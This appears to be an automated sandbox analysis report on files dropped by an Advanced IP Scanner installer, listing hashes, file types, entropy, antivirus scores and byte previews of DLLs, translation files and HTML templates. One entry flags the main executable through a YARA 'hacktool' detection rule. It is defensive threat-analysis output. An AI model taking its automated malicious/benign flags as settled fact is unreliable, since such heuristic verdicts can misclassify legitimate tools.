                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18112
                                                                                                                      Entropy (8bit):7.0782836442636174
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
                                                                                                                      MD5:7697F94ED76B22D83D677B999EDFC2E1
                                                                                                                      SHA1:42AFB5B8E76B8B77D845156B7124CC3E0C613F91
                                                                                                                      SHA-256:50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
                                                                                                                      SHA-512:1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1158
                                                                                                                      Entropy (8bit):4.839285803199877
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:AMJnuKov2Fke2B2uT2Bxc+2MKb2tq2HcA2RCz282n0Kt1RhRGDbgzY1pvzAkReEs:lFouAsuSMBXqHH+lL0Kt5RGDjReEhyv
                                                                                                                      MD5:1D24AAD630182B5018D26EE86FF9E1E5
                                                                                                                      SHA1:D0FFCE32DEB2A2B5BD98274D2D74B135855243F1
                                                                                                                      SHA-256:ED422482346F25140F3A4BC2B76225E64C0FB697FC4D9A0691F2B546E041D374
                                                                                                                      SHA-512:D943A02304C8EBA2306830FCCDAEB033E7C8D9AB5F385DC57ED5AB3B08B20B8EF343F28D6DC12990B62A718B3B96885A7E9893D29A0ACA6E7FDDDD29AFD8E5F5
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sustav:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Pojedinost
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1292
                                                                                                                      Entropy (8bit):5.135718210930255
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFo+ag1FGfysuSIIrXqF/w9HUkb830Kt5RGDLeMFG/zReEhyv:Hra4FGfysRxXqMHUkC0U2DqMFG/xs
                                                                                                                      MD5:37065F0D6A5CE8F22D831F76A7644D8B
                                                                                                                      SHA1:2750F55AC41F0888159604AFBCF70C6B894C01BD
                                                                                                                      SHA-256:18B7C895BABB71508CC7F2A5861C493A8FB13D12D2CBD7A2C0441DDDA5C545C2
                                                                                                                      SHA-512:8CA493719F739CA680BA666E0C55D4D471C207F1D8E7EC12DB2E93692A1123B94EB07B75311B667E5B31300C90C6009745AFE7F4067D237570091B3BD1ECB45E
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>..............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>......:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellsp
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26044
                                                                                                                      Entropy (8bit):5.23160860836295
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:USrTnWGBewzY6ek4qnVBarz5QVZSp8R0SRWEN8ejwVRH9Pkq0+u3lZR:U6bWGBe96YqVBarz5QVZ1pRDOeIJtKT
                                                                                                                      MD5:D7B6ACB98C438672B2D6E2DA7720191D
                                                                                                                      SHA1:3F2CCE40CA80158F1A24258309E78978A8915C85
                                                                                                                      SHA-256:DDB5D2E12292BF444B24067E959DE8EB60F7158C1FD7717433739B3E3752B539
                                                                                                                      SHA-512:ECCE6C5D0BE732DB27EAF8AD76D425AEC6A852DC41F9501CCAF2E755B7EE42735291FB199139A196DBC017A33B2CC54018CDE8E044E1E7C972C23506C75ACB6D
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........R....;...L...;.......;.......;...m...;..>....O..U....[..Q0...^..+....^..Mx..(5...{..G.......H,..J...K...:...N:...b..V...?{.._...V4......%.......J....y..KI......................RV...t..'7...t..K....t..T......;....j......5t......@...=Q..H5..S...f...,.......@,.......G...........~.......`..2....e..TM......Ts.......h. =...A#.*.y.....*.y...Y.*.%..!..*.0..!..+.......+.......+....V.+......+....#..G.......G....'..H0...T..Hw9...Y.Hw9.....I....%t.J6......J6......J6....p.J6...C..LD....t.L.b..T..M.S..<..R.......V....,M.Wi...S..W.T...5.Z.|..Ls.[f3..O..gc......w0K..B*..H...".......U....T...I..."..0....~..2~.. d..@....T..*...2...........St......Y-.9.E..;:.L.#..[..M$o.....e.......l8...2....^..C...I....2......=~......M3......S3..>......>...L..3..+...l...E.......5Z.5.l..XK.AV...%5.y....Q....0..M.......L.......R...tb..1.......................N1......8h......I..(....M..1V...&B.R....-..W.<..X..f.~...D......04..1........^..1....5...y..........c..@..;6...Z=.q.J..JF..I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28141
                                                                                                                      Entropy (8bit):4.629516521520014
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:XAbel+QUett3u72zMsS3z9K1A/TW/2bgH85qwDLEOghX5iNK+H:qQUetjTS3z9GAq/QcSqsLEM
                                                                                                                      MD5:08AB1F12E7ED69CA493109B02A920C27
                                                                                                                      SHA1:CD6433F48E1FA82747C57AE254E046BDEDC8A429
                                                                                                                      SHA-256:943EB81FB1A7D11FC3CAA8D7E5E9DEC1C4940983D516F2B9612B68AF07E4CA44
                                                                                                                      SHA-512:C00A5FF0C467F7A52AA837BD09234A4E4A959F6CE4D5EED773AC2FB7BAC9914A9748A54A41CA2269C240B5AF0644FB7B7A29286DA43D21B209E85D0E3713EEA0
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........Y....;.......;.......;.......;..!....;..D....O..\....[..XZ...^..0e...^..T...(5......G....R..H,..Q...K...@...N:...Z..V...E..._...].......)\......Q=...y..Q................`......Y....t..+....t..R....t..\G.....A....j......5t......@...C...H5..Zu..f...0.......F....................~..3>...`..8....e..[.......[.......... =...G..*.y.....*.y.../.*.%..%N.*.0..%w.+.....5.+.......+....f.+......+....'..G.... ..G....+e.H0...\..Hw9...Q.Hw9.....I....(..J6....Z.J6......J6......J6...J7.LD......L.b..\v.M.S..B,.R.....Z.V....0..Wi...[p.W.T.....Z.|..R..[f3..V..gc....".w0K..H...H...&!......]^...T...;..."..5L...~..7... d..G....T......2....W......Z.......a1.9.E..A<.L.#..c..M$o.....e.......l8...77...^..Jn..I....h......C.......S.......Z...>...w..>......3../...l...K.......:..5.l..`C.AV...(..y....X....0..T.......S.......Z9..tb..6 ...............a......U.......>.......O..(....TB.1V...)..R....2/.W.<..`..f.~.."p......4...1........^..6....5..............c..G\.;6...bW.q.J..P...I....#..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18624
                                                                                                                      Entropy (8bit):7.046229749504995
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
                                                                                                                      MD5:BFB08FB09E8D68673F2F0213C59E2B97
                                                                                                                      SHA1:E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
                                                                                                                      SHA-256:6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
                                                                                                                      SHA-512:E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):319
                                                                                                                      Entropy (8bit):4.379102897885305
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:CwTA5/S39XWIlkHKVDQEoE6J2lRWRYrWlp/IM1gEE6J2lRWRYrWlp2lbIMWSEE/1:HA0tR5pQlXJ2lRWGcPXJ2lRWG8+
                                                                                                                      MD5:FA3064E9270B3CE8D90EF2C4E00277C5
                                                                                                                      SHA1:6E55C6F99FDA993DD301172900AD96DE2258C6FC
                                                                                                                      SHA-256:BA4E20952EAE5DD959F1C0D3A4B9726A37BD81645D9DDE6B83C1E367032C77CD
                                                                                                                      SHA-512:12A796A7FA23B325B172CF4A1491A146117A0C938D1C64369EB1B7DF7277676832B32D5221383E48E8E244225E370DC75B69F5C7638A4A7D4FF6121A26032AC1
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B.............O.....P..q.....i........$.C.&.h.e.c.k. .f.o.r. .u.p.d.a.t.e.s..........Check for &updates.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.S.e.r.v.e.r..........Install Radmin Server.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.V.i.e.w.e.r..........Install Radmin Viewer.....VMain........
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1187
                                                                                                                      Entropy (8bit):5.11658152620251
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoIyGsuSIXqONHCYQhD0Kt5RGD0ReEhyv:HEGsRIXqONHChhD0U2D2s
                                                                                                                      MD5:7B64191A23A7F9EF19022435267FED84
                                                                                                                      SHA1:3BDE9A320DFC55B0F19625A0CC3DCD3DA41C04C6
                                                                                                                      SHA-256:58BA15AE4911E063749B5A4B7A34272E515F0C0A4399910AE0B983C90AF33516
                                                                                                                      SHA-512:F26B20D469909DE8979D10E19BEB94AB556D1D2C241BB1FBE99AD421F1E990DC2A4F7F3E3923A493058A396CEB2E8781CA7ED0802A9893E88D4196BB16C3E7C1
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>....</center>
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1681960
                                                                                                                      Entropy (8bit):6.535592110075899
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:N7MNjXLsvFfAhpjccQ1hhTlPrLFhNG2y+L+aJwDcN:0jXL2mboRRhrL42yE
                                                                                                                      MD5:B3411927CC7CD05E02BA64B2A789BBDE
                                                                                                                      SHA1:B26CFDE4CA74D5D5377889BBA5B60B5FC72DDA75
                                                                                                                      SHA-256:4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5
                                                                                                                      SHA-512:732C750FA31D31BF4C5143938096FEB37DF5E18751398BABD05C01D0B4E5350238B0DE02D0CDFD5BA6D1B942CB305BE091AAC9FE0AAD9FC7BA7E54A4DBC708FD
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_AdvancedIPScannerHacktool, Description: Yara detected Advanced IP Scanner Hacktool, Source: C:\Program Files (x86)\Advanced IP Scanner\is-FDUCH.tmp, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........lj..............u........j......x.......x.......d.......f.......x.......x.......f.......c.......c.......f..............'x......'x..`...'x..............'x......Rich............................PE..L....gb..........".................U.............@..........................P............@..................................3.......... p..............(....p..0....R..T....................S.......R..@...............d*...........................text.............................. ..`.rdata..b...........................@..@.data........0...4..................@....rsrc... p.......r...H..............@..@.reloc..0....p......................@..B........................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27753
                                                                                                                      Entropy (8bit):4.678188889713697
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:G9OyAk9n+iiUO3ipj1BlQdiJCEG7o5CjUiiPtVPpCAIA+rp9kBMHoyAC:G9OKn+i+3QjedMCUUUZVPp6z
                                                                                                                      MD5:0D6C50CD51EDD656D636117A22517308
                                                                                                                      SHA1:B9753A4E1D581A19D39B71187CBECCEAC0BA5066
                                                                                                                      SHA-256:D8680E21C7F89BB60C631AF894F5DEAB5B95CF87A6624F04B087C4A1BDBEACAD
                                                                                                                      SHA-512:91158D0D0B3DE7C34231F20542E2F2E8F98E76128C4E5B86F358E804CA6D30AD9E6162DE39FF018802CFDFA1BD6E3B3A85AB7A78AD77CC334D6478F8E815D02C
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........X....;.......;.../...;.......;.. ....;..B....O..[f...[..W(...^../?...^..S...(5...W..G.......H,..P...K...?4..N:......V...D/.._...\.......(|......P5...y..P........=..............XZ...t..*....t..Q....t..[......@4...j......5t...k..@...A...H5..Y'..f.../g......D....................~..2X...`..6....e..Zw......Z.......... =...E..*.y...n.*.y.....*.%..$`.*.0..$..+.......+.....,.+......+....n.+....&3.G.......G....*m.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....h.J6...H..LD......L.b..[<.M.S..@..R.......V..../..Wi...Z .W.T...[.Z.|..Q..[f3..U..gc......w0K..G"..H...%9......\....T......."..40...~..6R.. d..Ec...T..-...2....-......Y......._..9.E..?..L.#..b?.M$o.....e.....H.l8...6....^..H...I....Z......B$......R.......YO..>...7..>......3......l...Jj......94.5.l..^..AV...'..y....W....0..S.......R.......X...tb..5.......................S.......<.......N..(....S6.1V...)..R....1I.W.<.._5.f.~..!.......3...1........^..5a...5...u......2...c..E..;6...`..q.J..O|..I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):80128
                                                                                                                      Entropy (8bit):6.906674531653877
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                                                                                      MD5:1B171F9A428C44ACF85F89989007C328
                                                                                                                      SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                                                                                      SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                                                                                      SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26959
                                                                                                                      Entropy (8bit):4.713288631353564
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:ihIXQdwIyWqLSTgN1YYgX+9S1Dk+nK+sF7SVLHElRh:3XQdwIUCgN1YYgE2k1A4
                                                                                                                      MD5:AE4754AC60C32B9D44B47CAA489E5337
                                                                                                                      SHA1:6C3AEC0A9EF0945C06562D0ACD0E0558E18992AD
                                                                                                                      SHA-256:D09D333B00D073C09837F669D7A8DDD77D50B2D94A177E58CE556AF83700371A
                                                                                                                      SHA-512:74710A20298F162D6BE02F7BCBB964E447345D219887216366A7DCD283267A708666E974195F279E384526E324E27F0FBD713411E6BA58DE266069143575C6DC
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........U....;.......;.......;.......;.. A...;..@....O..XZ...[..TL...^...1...^..P:..(5......G....6..H,..MT..K...=@..N:...,..V...B#.._...Yn......'.......M....y..M.......................U~...t..)I...t..NV...t..X......>....j...[..5t...-..@...?...H5..V?..f....W......B........u.......Y...~..1....`..5....e..W.......W........:. =...C..*.y...B.*.y...E.*.%..#..*.0..#..+.......+.......+......+......+....%q.G.....g.G....)..H0...W..Hw9...g.Hw9.....I....'T.J6......J6....@.J6......J6...Fo.LD......L.b..X2.M.S..>..R.....\.V.....{.Wi...W4.W.T.....Z.|..O..[f3..R..gc....~.w0K..E...H...$w......X....T......."..2....~..4... d..Cc...T..,...2...........V.......\..9.E..=..L.#.._!.M$o.....e.......l8...4c...^..F...I....L......@"......O.......Vg..>......>...n..3..-...l...H*......7..5.l..[..AV...'..y....T....0..P.......O.......V...tb..3z.......s.......y......Q.......:.......L..(....Pf.1V...($.R....0).W.<..\).f.~..!.......2r..1........^..3....5..............c..C..;6...]..q.J..L...I.......I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18624
                                                                                                                      Entropy (8bit):6.982441576564087
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
                                                                                                                      MD5:584766DF684B2AD2A3A5B05A5B457FAC
                                                                                                                      SHA1:C207B7AEDB8D978C8320A1454331519A8365F20D
                                                                                                                      SHA-256:B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
                                                                                                                      SHA-512:3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......!h....@.......................................... ...................<..............8............................................................................text...+........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):900288
                                                                                                                      Entropy (8bit):6.823623458577979
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
                                                                                                                      MD5:3E0303F978818E5C944F5485792696FD
                                                                                                                      SHA1:3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
                                                                                                                      SHA-256:7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
                                                                                                                      SHA-512:C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L....:.U...........!................0.....................................................@A........................P,..f....2.......P...................<...`..dX..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..dX...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):18624
                                                                                                                      Entropy (8bit):7.04628745407397
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:bhkd6WVghW/vt7l9YOCAs/nGfe4pBjSfWP18gWNArXVWQ4mW0tXqnajL1dHx3tKU:aYW2hWt7QA0GftpBj7PS8rxlXBtFwVoF
                                                                                                                      MD5:07954AF744363F9807355E4E9408DF45
                                                                                                                      SHA1:B37D06B39EB7186B55CEAE25427B7AB95E46E32F
                                                                                                                      SHA-256:4B20AAF0E3B7566B797652F8D84B749AB23F7D1557DBA882C0590FE1BE98CED6
                                                                                                                      SHA-512:B7A7C16EF8BE62D9F562DCECF01B2AD1C066DE92AA4CA7A8C7BB93A80B1BC781F8A6A47F51A252E40337BD8D7778CACFEE7488A5FAD15F11D24C90572AD0E4C6
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:Qt Translation file
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26887
                                                                                                                      Entropy (8bit):4.711499642917058
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:NJLP6Bk0ZQt9u0+UXuxtIc4JLDTcH6NcBq:NVyp+tU0+FxWc+Dq62o
                                                                                                                      MD5:D0C083D4760D44DB80A0AEDE7862D5EC
                                                                                                                      SHA1:155B7B067596D105B0BC4471BD654F1D9B720D20
                                                                                                                      SHA-256:186D5FAF9ED383C64DBA358B559D2E62ED7D60A24AECA570403086950E381176
                                                                                                                      SHA-512:B47BA5D333C6334AC9C1987C66C4EC51C11A2EC9EF8865B1BC334656E3629900D094888A9939ED7D08F1E609E683EDC69212D467626A705ADBFB2DE60000D5A0
                                                                                                                      Malicious:false
                                                                                                                      Preview:<.d....!..`...B..........U....;.......;...U...;...g...;.. ....;..@....O..W....[..S....^...)...^..O...(5......G.......H,..L...K...=H..N:......V...B..._...X.......'.......M....y..M................d......T....t..)5...t..M....t..W......>....j...5..5t......@...?...H5..U...f....I......B........i.......%...~..1<...`..5 ...e..W.......W+......... =...C..*.y.....*.y...3.*.%..#v.*.0..#..+.....s.+.......+......+......+....%Q.G.....A.G....)..H0...WW.Hw9...C.Hw9...s.I....'<.J6......J6......J6......J6...F/.LD......L.b..W..M.S..>..R.....".V.....o.Wi...V..W.T.....Z.|..N..[f3..R^.gc....N.w0K..D...H...$Q......Xz...T......."..2....~..4... d..C=...T..,...2...........V ......\K.9.E..=..L.#..^..M$o.....e.......l8...4i...^..Fb..I....8......@.......O.......U...>......>...f..3..-...l...G.......7..5.l..[9.AV...&..y....T%...0..PT......OM......Uy..tb..3........?.......g......P.......:.......K..(....O..1V...(..R....0;.W.<..[..f.~.. .......2...1........^..3....5..........x...c..C..;6...]m.q.J..Lh..I....O..I
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):19136
                                                                                                                      Entropy (8bit):7.02455319040347
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:wWVghW/4gbXH9YOCAs/nGfe4pBjSfIMYgWNArXVWQ4mWu5BXqnajL1dHx3tKrSwZ:wW2hWwgbCA0GftpBjRMNBtlXBtFwuWd
                                                                                                                      MD5:E70D8FE9D21841202B4FD1CF55D37AC5
                                                                                                                      SHA1:FA62FB609D15C8AD3B5A12618BCC50F0D95CDEA3
                                                                                                                      SHA-256:E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D
                                                                                                                      SHA-512:BD38BDF80DEFD4548580E7973D89ED29E1EDD401F202C367A3BA0020678206DA3ACC9B4436C9A122E4EFC32E80DBB39EB9BF08587E4FEBC8F14EC86A8993BCC8
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
